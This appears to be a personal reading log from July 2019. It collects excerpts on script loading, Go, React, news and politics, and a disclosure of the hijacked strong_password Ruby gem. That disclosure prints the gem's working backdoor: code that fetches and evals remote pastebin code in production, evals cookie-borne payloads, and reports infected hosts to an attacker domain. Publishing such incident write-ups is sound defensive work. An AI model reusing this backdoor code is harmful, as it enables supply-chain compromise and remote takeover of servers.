resources until it runs the bootstrapping code we wrote to inject modern vs legacy scripts. Normally, browsers scan HTML as it is being streamed to look for resources they can preload. There's a solution, though it's not perfect: we can use <link rel=modulepreload> to preload the modern version of a bundle in modern browsers. Unfortunately, only Chrome supports modulepreload so far. <link rel="modulepreload" href="/modern.js"> <script type=module>self.modern=1</script> <!-- etc --> Whether this technique works for you can come down to the size of the HTML document you're embedding those scripts into. If your HTML payload is as small as a splash screen or just enough to bootstrap a client-side application, giving up the preload scanner is less likely to impact performance. If you are server-rendering a lot of meaningful HTML for the browser to stream, the preload scanner is your friend and this might not be the best approach for you. Here's what this solution might look like in prod: <link rel="modulepreload" href="/modern.js"> <script type=module>self.modern=1</script> <script> $loadjs("/modern.js","/legacy.js") function $loadjs(e,d,c){c=document.createElement("script"),self.modern?(c.src=e,c.type="module"):c.src=d,document.head.appendChild(c)} </script> Option 2: User Agent Sniffing I don't have a concise code sample for this since User Agent detection is nontrivial, but there's a great Smashing Magazine article about it. Essentially, this technique starts with the same <script src=bundle.js> in the HTML for all browsers. When bundle.js is requested, the server parses the requesting browser's User Agent string and chooses whether to return modern or legacy JavaScript, depending on whether that browser is recognized as modern or not. While this approach is versatile, it comes with some severe implications: since server smarts are required, this doesn't work for static deployment (static site generators, Netlify, etc) caching for those JavaScript URLs now varies based on User Agent, which is highly volatile UA detection is difficult and can be prone to false classification the User Agent string is easily spoofable and new UA's arrive daily One way to address these limitations is to combine the module/nomodule pattern with User Agent differentiation in order to avoid sending multiple bundle versions in the first place. This approach still reduces cacheability of the page, but allows for effective preloading, since the server generating our HTML knows whether to use modulepreload or preload. For websites already generating HTML on the server in response to each request, this can be an effective solution for modern script loading. Option 3: Penalize older browsers The ill-effects of the module/nomodule pattern are seen in old versions of Chrome, Firefox and Safari - browser versions with very limited usage, since users are automatically updated to the latest version. This doesn't hold true for Edge 16-18, but there is hope: new versions of Edge will use a Chromium-based renderer that doesn't suffer from this issue. It might be perfectly reasonable for some applications to accept this as a trade-off: you get to deliver modern code to 90% of browsers, at the expense of some extra bandwidth on older browsers. Notably, none of the User Agents suffering from this over-fetching issue have significant mobile market share - so those bytes are less likely to be coming from an expensive mobile plan or through a device with a slow processor. If you're building a site where your users are primarily on mobile or recent browsers, the simplest form of the module/nomodule pattern will work for the vast majority of your users. Just be sure to include the Safari 10.1 fix if you have usage from slightly older iOS devices. <!-- polyfill `nomodule` in Safari 10.1: --> <script type=module> !function(e,t,n){!("noModule"in(t=e.createElement("script")))&&"onbeforeload"in t&&(n=!1,e.addEventListener("beforeload",function(e){if(e.target===t)n=!0;else if(!e.target.hasAttribute("nomodule")||!n)return;e.preventDefault()},!0),t.type="module",t.src=".",e.head.appendChild(t),t.remove())}(document) </script> <!-- 90+% of browsers: --> <script src=modern.js type=module></script> <!-- IE, Edge <16, Safari <10.1, old desktop: --> <script src=legacy.js nomodule async defer></script> Option 4: Use conditional bundles One clever approach here is to use nomodule to conditionally load bundles containing code that isn't needed in modern browsers, such as polyfills. With this approach, the worst-case is that the polyfills are loaded or possibly even executed (in Safari 10.1), but the effect is limited to "over-polyfilling". Given that the current prevailing approach is to load and execute polyfills in all browsers, this can be a net improvement. <!-- newer browsers won't load this bundle: --> <script nomodule src="polyfills.js"></script> <!-- all browsers load this one: --> <script src="/bundle.js"></script> Angular CLI can be configured to use this approach for polyfills, as demonstrated by Minko Gechev. After reading about this approach, I realized we could switch the automatic polyfill injection in preact-cli to use it - this PR shows how easy it can be to adopt the technique. For those using Webpack, there's a handy plugin for html-webpack-plugin that makes it easy to add nomodule to polyfill bundles. What should you do? The answer depends on your use-case. If you're building a client-side application and your app's HTML payload is little more than a <script>, you might find Option 1 to be compelling. If you're building a server-rendered website and can afford the caching impact, Option 2 could be for you. If you're using universal rendering, the performance benefits offered by preload scanning might be very important, and you look to Option 3 or Option 4. Choose what fits your architecture. Personally, I tend to make the decision to optimize for faster parse times on mobile rather than the download cost on some desktop browsers. Mobile users experience parsing and data costs as actual expenses - battery drain and data fees - whereas desktop users don't tend to have these constraints. Plus, it's optimizing for the 90% - for the stuff I work on, most users are on modern and/or mobile browsers. Further Reading Interested in diving deeper into this space? Here's some places to start digging: Thanks to Phil, Shubhie, Alex, Houssein, Ralph and Addy for the feedback. Jason Miller's Picture Jason Miller Read more posts by this author. Share this post Twitter Facebook Google+ disqus Source: Modern Script Loading

    Read at 01:55 pm, Jul 10th

  • One Conversation, Two Histories — My perspective on an incident in a San Francisco doorway

    Why have I been blocked? This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data. Source: One Conversation, Two Histories — My perspective on an incident in a San Francisco doorway

    Read at 01:48 pm, Jul 10th

  • Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!

    Why have I been blocked? This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data. Source: Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!

    Read at 10:14 am, Jul 10th

Day of Jul 9th, 2019

  • Building reusable components using React

    React is one of the most popular JavaScript libraries for building user interfaces. To build an application using React, you just need to build encapsulated components that can contain their own state.

    Read at 09:31 am, Jul 9th

  • Next steps toward Go 2

    We’re well on the way towards the release of Go 1.13, hopefully in early August of this year. This is the first release that will include concrete changes to the language (rather than just minor adjustments to the spec), after a longer moratorium on any such changes.

    Read at 07:12 pm, Jul 9th

  • Former fighter pilot launches Senate challenge against McConnell

    Amy McGrath, a Kentucky Democrat and former fighter pilot who lost a House race last year, said Tuesday she's running for Senate against Majority Leader Mitch McConnell in what could be one of 2020's most expensive races.

    Read at 06:46 pm, Jul 9th

  • Jony Ive Is Leaving Apple

    Apple Newsroom: Apple today announced that Sir Jony Ive, Apple’s chief design officer, will depart the company as an employee later this year to form an independent design company which will count Apple among its primary clients.

    Read at 02:37 pm, Jul 9th

  • I was 7 words away from being spear-phished

    Three weeks ago I received a very flattering email from the University of Cambridge, asking me to judge the Adam Smith Prize for Economics: Dear Robert, My name is Gregory Harris. I’m one of the Adam Smith Prize Organizers.

    Read at 01:05 pm, Jul 9th

  • The Layout Instability API

    Detect unexpected layout shifts in JavaScript. Have you ever been reading an article online when something suddenly changes on the page? Without warning, the text moves, and you've lost your place.

    Read at 09:44 am, Jul 9th

  • The Immigration Court Judge Who Has Rejected Every Asylum Seeker

    Oakdale, a sleepy town of 7,600 in Louisiana, is home to a drive-through daiquiri stand, two Mexican restaurants, numerous shuttered storefronts, and, on its northeastern border, the Oakdale Immigration Court.

    Read at 07:08 pm, Jul 9th

  • Google Launches Effort to Make Robots Exclusion Protocol an Internet Standard, Open Sources Robots.txt Parser

    Website owners have been excluding web crawlers using the Robots Exclusion Protocol (REP) on robots.txt files for 25 years. Up until now, there has never been an official Internet standard, no documented specification for writing the rules correctly according to the protocol.

    Read at 09:27 am, Jul 9th

  • Menus with “Dynamic Hit Areas”

    The most compelling examples that solve this issue are the ones that involve extra hidden "hit areas." Amazon doesn't really have menus like this anymore (that I can see), and perhaps this is one of the reasons why. But in the past, they've used this hit area technique.

    Read at 09:27 am, Jul 9th

  • 12 Tips for Improving JavaScript Performance

    One of the most important aspects when creating a webpage or an app, is performance. Nobody wants an app that crashes or a webpage that doesn’t load, and the waiting time of the users is not very long.

    Read at 09:26 am, Jul 9th

  • Announcing React Native 0.60

    After months of hard work from hundreds of contributors, the React Native Core team is proud to announce the release of version 0.60. This release handles significant migrations for both Android and iOS platforms, and many issues are resolved too. This blog post covers the highlights of the release.

    Read at 09:14 am, Jul 9th

  • In US 1st, baby is born from dead donor's transplanted womb

    This June 18, 2019 photo provided by the Cleveland Clinic shows the newborn girl born from a woman who received the hospital's first uterus transplant. Uterine transplants have enabled more than a dozen women to give birth. (Stephen Travarca/Cleveland Clinic via AP) CLEVELAND (AP) — The Cleveland Clinic says it has delivered the first baby in North America after a womb transplant from a dead donor. Uterine transplants have enabled more than a dozen women to give birth, usually with wombs donated from a living donor such as a friend or relative. In December, doctors in Brazil reported the world’s first birth using a deceased donor’s womb. These transplants were pioneered by a Swedish doctor who did the first successful one five years ago. The Cleveland hospital said Tuesday that the girl was born in June. The clinic has done five uterus transplants so far and three have been successful, with two women waiting to attempt pregnancy with new wombs. In all, the clinic aims to enroll 10 women in its study. Source: In US 1st, baby is born from dead donor’s transplanted womb

    Read at 02:09 pm, Jul 9th

Day of Jul 8th, 2019

  • Toast

    Twitter Facebook Twitter Facebook

    Read at 09:16 am, Jul 8th

  • No Algorithms

    I’ve been asked a few times about using algorithms in NetNewsWire to bring articles you wouldn’t otherwise have seen — from outside your feeds list — to your attention.

    Read at 10:06 pm, Jul 8th

  • Building an IndieWeb Reader

    Over the last several months, I've been slowly putting the pieces in place to be able to build a solid indieweb reader. Today, I feel like I finally have enough in place to consider this functional enough that I am now using it every day!

    Read at 07:20 pm, Jul 8th

  • An IndieWeb reader: My new home on the internet

    I have a new home on the internet. I don’t visit the Twitter home timeline or the Facebook news feed anymore. I don’t open the Instagram app except when I post a photo. I still have accounts there — I just don’t visit those sites anymore.

    Read at 07:10 pm, Jul 8th

  • Why Milkshaking Works

    The far right fears nothing more than public humiliation.

    Read at 07:05 pm, Jul 8th

  • An Executive Order Can’t Fix Trump’s Census Problem

    President Donald Trump’s announcement that he will consider using an executive order to get a citizenship question on the 2020 census is but the latest presidential attempt to exaggerate or mythologize the power of the executive order.

    Read at 07:02 pm, Jul 8th

  • /Red Net/

    Happy #MayDay Comrades! Chaos in Paris today as police charge at anti-government protesters and attack them with batons. Has this been on the BBC yet? pic.twitter.com/T31bvCd5Of #GiletsJaunes #MayDay

    Read at 12:21 pm, Jul 8th

  • ES proposal: public class fields

    This blog post is first in a series of posts on fields in classes. Fields are about creating properties and similar constructs from inside the bodies of classes. Once finished, this series replaces 2ality’s prior blog post on fields.

    Read at 09:21 am, Jul 8th

  • New Intl APIs in JavaScript

    The Intl object is available in the global scope and is used for formatting strings, numbers, and date and time in the locale-specific format. It does the work of internationalizing information displayed to the user.

    Read at 10:05 pm, Jul 8th

  • Lessons in learning web development

    These tips I wrote to my fellow coleagues learning the way into web development. I hope it’s either useful or entertaining. The Web is a wild and young forest. We are constantly trying to make it greener and more accessible without burning it so much.

    Read at 09:14 am, Jul 8th

  • Politely Passing on Pass the Hat

    The “Pass the Hat” proposal, while incredibly well-meaning, could create as many problems as it would hope to solve. Recently, I chatted with Nick Bunce, former Co-Chair of Houston DSA.

    Read at 09:10 am, Jul 8th

  • Passing the Hat for Cross-Chapter Solidarity

    I visited the NYC-DSA Media Working Group one slushy winter night, and left feeling a little bit jealous. The room was crowded with more than 50 socialists, which is easily more than five times the regular attendance of the monthly meetings in Central Florida DSA in Gainseville, FL.

    Read at 09:06 am, Jul 8th

  • What a June! A review of our wins in 2019.

    Over the last year, NYC-DSA has had three priority campaigns: #UniversalRentControl, Health Care for All, and Defeat Amazon.

    Read at 09:01 am, Jul 8th

  • Working Groups

    This month, the Debt & Finance Working Group held an Organizing Committee election. Four members will be continuing on the committee and one new member will be joining. Debt & Finance has been very focused on its public banking campaign.

    Read at 08:54 am, Jul 8th

  • NYPD Used Deadly Force to Stop Cyclist Suspected of Running Red Light – Streetsblog New York City

    .entry-header A law enforcement regime that doesn't take into account the relative capacity of bicycling and driving to cause harm is deeply flawed, and leads to scenarios like cops confiscating e-bikes from delivery workers as motorists kill seniors in crosswalks. .entry-header Cyclists are demanding answers to the latest attack. .entry-header Meet George Calderaro, a victim of the NYPD's overzealous pursuit of cyclists. .entry-header Here’s an argument for using cameras to enforce traffic laws: getting cops like this off of the traffic beat. As first reported in the Daily News, Brooklyn cyclist Ben Kopciel was issued a $200 ticket earlier this month in what looks like a retaliatory gesture for telling an NYPD officer to get out of the […] .entry-header What is with the NYPD's ongoing crackdowns against cyclists after cyclists are killed? .entry-header Considering what happened to longtime street safety advocate Hilda Cohen last Friday afternoon, you have to wonder how many “scofflaw cyclists” are in actuality the victims of police harassment. The incident is also another example of wasted NYPD resources that could be used to make streets safer. Cohen says she rode through a yellow light […] Source: NYPD Used Deadly Force to Stop Cyclist Suspected of Running Red Light – Streetsblog New York City

    Read at 05:20 pm, Jul 8th

  • The Progressive Nonargument Against Biden - The Atlantic

    “I literally leaned back in my couch and couldn’t believe that one moment,” he told CNN. “I think that anybody that knows our painful history knows that on voting rights, on civil rights, on the protections from hate crimes, African Americans and many other groups in this country have had to turn to the federal government to intervene because there were states that were violating those rights.” That history is painful and important. Many Americans still underestimate the ongoing need for federal protection of civil rights against state and local governments. But wait a minute. Hearing Booker, you might think that Biden has opposed federal interventions to protect voting rights, civil rights, and victims of hate crimes. In fact, Biden has long supported an expansive federal role in all three areas and voted in 2001 to add sexual orientation to the protected categories in federal hate-crime law. There’s a lot about Biden’s record to dislike. Booker remarked on an area where he’s—by liberal Democrat standards—strong. Listening to Harris, you might think that she, unlike Biden, favors federally mandated busing as a tool to reduce segregation. “Does Harris support busing for school integration right now?” the New York Times reporter Astead W. Herndon asked Ian Sams, her campaign manager, on June 27. “Yes,” he replied. But Harris later clarified that she does not favor federally mandated busing right now. Rather, she thinks that some school districts should consider it on a voluntary basis, and that for the most part busing is no longer necessary in America. “It sounds here like @KamalaHarris is now taking something more like the @JoeBiden position on school busing,” said David Axelrod, a political adviser in the Obama administration. “So what was that whole thing at the debate all about?” It wasn’t about Biden’s electability or what a President Biden would do in 2021 about busing or other federal interventions to protect civil rights (or even what he did from 2009 to 2016). Harris and Biden disagree on whether federally mandated busing was a sound policy almost 50 years ago. They have no similar difference on federal civil-rights policy today. Would Harris necessarily be better on matters of federal civil rights than Biden? At the very least, her record as a prosecutor makes that an open question. I don’t mean to rule out the past. Biden’s vote in favor of the Iraq War ought to count against him––but that’s in part because it is relevant to what he might do if urged to launch a future war of choice against a foreign adversary. It makes no sense for Democrats to focus so intensely on busing, an issue with these characteristics: Absent from every list of voter priorities Backward-looking Unlikely to come before the next president No difference in the current positions of candidates “Debate” largely focused on demands for apologies Source: The Progressive Nonargument Against Biden – The Atlantic

    Read at 11:59 am, Jul 8th

  • strong_password v0.0.7 rubygem hijacked

    strong_password v0.0.7 rubygem hijacked Tute Costa July 3, 2019 I recently updated minor and patch versions of the gems our Rails app uses. We want to keep dependencies fresh, bugs fixed, security vulnerabilities addressed while maintaining a high chance of backward compatibility with our codebase. In all, it was 25 gems we’d upgrade. I went line by line linking to each library’s changeset. This due diligence never reported significant surprises to me, until this time. Most gems have a CHANGELOG.md file that describes the changes in each version. Some do not, and I had to compare by git tags or commits list (like cocoon or bcrypt gems). The jquery-rails upgrade contains a jQuery.js upgrade, so the related log was in another project. And I couldn’t find the changes for strong_password. It appeared to have gone from 0.0.6 to 0.0.7, yet the last change in any branch in GitHub was from 6 months ago, and we were up to date with those. If there was new code, it existed only in RubyGems.org. I downloaded the gem from RubyGems and compared its contents with the latest copy in GitHub. At the end of lib/strong_password/strength_checker.rb version 0.0.7 there was the following: 1 2 3 4 def _!;begin;yield;rescue Exception;end;end _!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if Rails.env[0]=="p"} I checked who published it and it was an almost empty account, with a different name than the maintainer’s, with access only to this gem. I checked the maintainer’s email in GitHub and wrote to him with the prettified version of the diff: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 def _!; begin; yield; rescue Exception; end; end _!{ Thread.new { loop { _!{ sleep rand * 3333; eval( Net::HTTP.get( URI('https://pastebin.com/raw/xa456PFt') ) ) } } } if Rails.env[0] == "p" } In a loop within a new thread, after waiting for a random number of seconds up to about an hour, it fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise. In fifteen minutes, Brian McManus wrote back: The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was created 6/25/2019. In case the Pastebin got deleted or changed, I emailed the Pastebin that was up on June 28th at 8 PM UTC, carbon-copying Ruby on Rails’ security coordinator, Rafael França: 1 2 3 4 5 6 7 8 9 10 11 _! { unless defined?(Z1) Rack::Sendfile.prepend Module.new{define_method(:call){|e| _!{eval(Base64.urlsafe_decode64(e['HTTP_COOKIE'].match(/___id=(.+);/)[1]))} super(e)}} Z1 = "(:" end } _! { Faraday.get("http://smiley.zzz.com.ua", { "x" => ENV["URL_HOST"].to_s }) While waiting for their answers, I tried to understand the code. If it didn’t run before (checking for the existence of the Z1 dummy constant) it injects a middleware that eval‘s cookies named with an ___id suffix, only in production, all surrounded by the empty exception handler _! function that’s defined in the hijacked gem, opening the door to silently executing remote code in production at the attacker’s will. It also sends a request to a controlled domain with an HTTP header informing the infected host URLs. It depends on the Faraday gem being loaded for the notification to work (which the oauth2 and stripe gems, for example, include). Rafael França replied in 25 minutes, adding security@rubygems.org to the thread. Someone at RubyGems quickly yanked it, and the next day André Arko confirmed he had yanked it, locked the kickball RubyGems account, and added Brian back to the gem. I asked for a CVE identifier (Common Vulnerabilities and Exposures) to cve-request@mitre.org, and they assigned CVE-2019-13354, which I used to announce the potential issue in production installations to the rubysec/ruby-advisory-db project and the ruby-security-ann Google Group. Source: strong_password v0.0.7 rubygem hijacked

    Read at 10:17 am, Jul 8th

Day of Jul 7th, 2019